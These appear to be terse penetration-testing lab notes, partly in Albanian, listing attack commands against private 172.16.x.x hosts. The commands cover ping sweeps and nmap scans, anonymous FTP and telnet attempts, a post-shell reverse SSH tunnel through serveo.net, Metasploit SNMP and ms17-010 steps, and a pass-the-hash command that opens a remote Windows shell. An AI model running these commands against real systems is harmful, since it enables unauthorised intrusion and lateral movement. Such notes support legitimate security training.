identify alive hosts
seq 1 254
for i in $(seq 1 254); do ping -c 1 '172.16.60.'$i;done
cat output.txt | grep 'bytes of data' | cut -d ' ' -f 2

nmap 172.16.60.0/24 ###1 check alived host, check top 1025 well known ports
nmap -sn 172.16.60.1/24 --sn e kontrollon veq a eshte hap
nmap 172.16.60.1/24 -p- -- -p- check all range ports
nmap -sS -sV 172.16.1.172 -- -p5988 ### check specific port

attempts on open ports found via nmap
ftp
try anonymous/anonymous
ftp 172.16.1.19
telnet 172.16.1.19 21
telnet 172.16.1.19

pasi ke marr access ne shell
ssh -R cyberacademy2018:80:localhost:80 serveo.net

rtsp 554 /me vlc
ne vlc network url: rtsp:172.16.1.19:554

snmp
sudo msfconsole	
auxiliary
set community filename
exploit
search ms17-010

windows
# searchsploit "windows server 2008"
# locate windows/remote/41987.py
./pth-winexe -U WOURKGROUP/user%hash //172.16.1.204 cmd ### pass the hash